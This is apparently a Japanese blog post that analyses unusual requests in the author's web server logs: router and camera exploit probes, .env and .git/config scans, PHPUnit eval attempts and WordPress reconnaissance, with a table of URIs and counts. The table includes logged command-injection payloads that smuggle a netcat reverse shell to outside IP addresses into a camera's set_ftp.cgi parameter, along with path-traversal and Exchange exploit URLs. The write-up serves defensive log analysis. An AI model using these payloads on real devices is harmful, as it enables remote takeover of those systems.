公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
ルータなどのネットワーク機器の調査
脆弱性が報告されているルーターなどで使われているログイン画面へアクセスする通信
JVNDB-2016-004125 - JVN iPedia - 脆弱性対策情報データベース
login.cgi
.envの調査
/.env
/api/.env
/.env.example
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
/wp-content/themes/seotheme/db.php?u
webカメラの脆弱性
/ftptest.cgi?loginuse=&loginpas=
Hikvision製ネットワークカメラの脆弱性
Hikvision製ネットワークカメラの脆弱性(CVE-2021-36260)について
/SDK/webLanguage
Netlink GPONルータ 脆弱性
ルータの脆弱性「CVE-2020-10173」を利用するIoTマルウェア | トレンドマイクロ セキュリティブログ
/boaform/admin/formLogin
git configの調査
/.git/config
ルーターの脆弱性の調査
/GponForm/diag_Form?images/
Wordpressの情報取集
ログイン画面の調査
/wp-login.php
/post/wp-login.php
wlwmanifest.xmlの調査
Windows Live Writerというツールの設定ファイルがあるかの調査
/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
参考情報
Webカメラが乗っ取られる! ネット機器の脆弱性、検証して専門家に聞いてみた【イニシャルB】 - INTERNET Watch
不審な通信の一覧
| uri | count |
|---|---|
| login.cgi | 482 |
| /ads.txt | 478 |
| /.env | 423 |
| /wp-content/themes/seotheme/db.php?u | 341 |
| /sw.js | 331 |
| /wp-login.php | 156 |
| /ftptest.cgi?loginuse=&loginpas= | 152 |
| /sellers.json | 151 |
| * | 137 |
| /SDK/webLanguage | 129 |
| /laravel/.env | 111 |
| /boaform/admin/formLogin | 106 |
| /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+185.237.96.28+1245+-e+%2Fbin%2Fsh%29 | 105 |
| /.git/config | 86 |
| /_profiler/phpinfo | 82 |
| /cgi-bin/hi3510/getidentify.cgi | 72 |
| //.env | 71 |
| /index.xml | 67 |
| /config/getuser?index=0 | 63 |
| /api/.env | 58 |
| /.env.example | 58 |
| /actuator/gateway/routes | 55 |
| /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession | 54 |
| /docs/.env | 54 |
| /blog/.env | 54 |
| /post/wp-login.php | 53 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 51 |
| /ab2g | 50 |
| /wp-includes/wlwmanifest.xml | 49 |
| /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+194.55.186.198+1245+-e+%2Fbin%2Fsh%29 | 48 |
| /ab2h | 44 |
| /GponForm/diag_Form?images/ | 43 |
| /xmlrpc.php?rsd | 42 |
| /wp/wp-includes/wlwmanifest.xml | 42 |
| /wordpress/wp-includes/wlwmanifest.xml | 42 |
| /site/wp-includes/wlwmanifest.xml | 42 |
| /cms/wp-includes/wlwmanifest.xml | 42 |
| /blog/wp-includes/wlwmanifest.xml | 42 |
| mstshash=Administr | 41 |
| \x00\x00\x00\x00\x00\x00\x00 | 37 |
| /explore | 36 |
| /wp1/wp-includes/wlwmanifest.xml | 34 |
| /web/wp-includes/wlwmanifest.xml | 34 |
| /test/wp-includes/wlwmanifest.xml | 34 |
| 188.214.129.95:4444 | 33 |
| /wp2/wp-includes/wlwmanifest.xml | 32 |
| /website/wp-includes/wlwmanifest.xml | 32 |
| /sito/wp-includes/wlwmanifest.xml | 32 |
| /news/wp-includes/wlwmanifest.xml | 32 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 30 |
| /app-ads.txt | 30 |
| /shop/wp-includes/wlwmanifest.xml | 29 |
| /actuator/health | 28 |
| /2019/wp-includes/wlwmanifest.xml | 28 |
| //wp-content/ | 28 |
| /debug/default/view?panel=config | 24 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 22 |
| /sitemap.xml | 22 |
| /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application | 22 |
| /config.json | 22 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 22 |
| google.com:443 | 20 |
| /wp-content/themes/seotheme/mar.php | 20 |
| /wp-content/plugins/seoplugins/mar.php | 20 |
| /docker-compose.yml | 20 |
| mstshash=Domain | 18 |
| /uploads/ | 18 |
| /images/ | 18 |
| /admin/console/ | 18 |
| //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 18 |
| /categories/%E6%8A%80%E8%A1%93%E7%B3%BB | 17 |
| /api/v2/cmdb/system/admin/admin | 17 |
| /.well-known/security.txt | 17 |
| /wp-admin/css/ | 16 |
| /sites/default/files/ | 16 |
| /info.php | 16 |
| /admin/controller/extension/extension/ | 16 |
| /.well-known/ | 16 |
